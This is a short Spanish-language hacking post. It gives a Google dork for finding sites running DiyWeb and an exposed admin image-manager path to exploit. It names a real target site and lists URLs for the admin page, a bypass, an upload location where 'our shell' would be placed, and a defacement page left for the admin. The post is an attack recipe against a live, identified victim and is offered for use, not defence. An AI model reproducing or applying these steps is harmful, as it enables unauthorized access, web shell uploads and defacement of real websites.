Dork
"Power by DiyWeb"
inurl:/template.asp?menuid=
exploit : diyweb/menu/admin/image_manager.asp
ejemplo
http://www.ultraracing.com.my/diyweb/menu/admin/image_manager.asp
y con un poco de ingenio bypass
http://www.ultraracing.com.my/vgreenwap/image/404.php
(http://4.bp.blogspot.com/-jLPdQurr29U/UDxAAwRZ5eI/AAAAAAAAABA/Dnnm2gEAXCg/s320/Sin+t%C3%ADtulo.jpg)
y acá subiríamos nuestra shell
como somos chicos buenos le dejaremos un mensaje al admin
http://www.ultraracing.com.my/vgreenwap/wp.html
(http://1.bp.blogspot.com/-QoOfOv1xlQo/UDxAOdiNhQI/AAAAAAAAABI/pyOhgty-nyM/s320/4.png)
saludos